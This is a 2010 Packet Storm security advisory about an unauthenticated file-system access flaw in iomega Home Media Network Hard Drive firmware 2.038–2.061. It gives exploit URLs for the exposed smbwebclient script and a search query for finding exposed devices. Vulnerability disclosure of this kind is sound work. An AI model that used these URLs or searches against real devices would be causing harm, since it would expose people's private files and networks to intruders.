what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iOmega Home Media Network Drive Arbitrary Access

iOmega Home Media Network Drive Arbitrary Access
Posted Apr 15, 2010
Authored by fizix610

iOmega Home Media Network Hard Drive firmware version 2.038 through 2.061 suffer from an unauthenticated access vulnerability.

tags | exploit
SHA-256 | 2cd1de52837d1fdcc72f8f653ffe102295eda8e88b928a3da31fdfe6dfcfb58f

iOmega Home Media Network Drive Arbitrary Access

Change Mirror Download
-----------------------------
Advisory
-----------------------------
Unauthenticated File-system Access in iomega Home Media Network Hard Drive

-----------------------------
Affected products
-----------------------------
iomega Home Media Network Hard Drive Firmware versions 2.038 - 2.061

-----------------------------
Timeline
-----------------------------
04.13.2010 - Discovered, disclosed to Bugtraq.

-----------------------------
Disclosure
-----------------------------
Full. Not disclosed to vendor due to latest firmware not being vulnerable.

-----------------------------
Details
-----------------------------
iomega chose to use smbwebclient to allow users of its product to access files shared by the device via their web browser. However, smbwebclient is in an unprotected directory allowing access without authentication. smbwebclient grants the user full browser-based read/write access to any visible shares on the device itself OR the rest of the device's local network (assuming the shares' permissions grant said access).

-----------------------------
Exploit
-----------------------------
View shares on device:
http://[DEVICE IP OR HOSTNAME]/cgi-bin/smbwebclient.php?path=WORKGROUP%2F[DEVICE NAME]
(Device name is found in title of webpage on root directory of device)

View all shares on device's local network:
http://[DEVICE IP OR HOSTNAME]/cgi-bin/smbwebclient.php

-----------------------------
Detection
-----------------------------
51 results returned in the following search on ERIPP:
http://eripp.com/?ipdb=1&search="Iomega"&sort=time&order=DESC&limit=20&submitbutton=Search

If device displays a slideshow on the root (home) page it is generally firmware version 2.063 and is not vulnerable.

-----------------------------
References
-----------------------------
http://go.iomega.com/en-us/products/network-storage-desktop/home-network-hard-drives/home-media/?partner=4760
http://smbwebclient.sourceforge.net/2005/02/version-22.html
http://eripp.com/
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close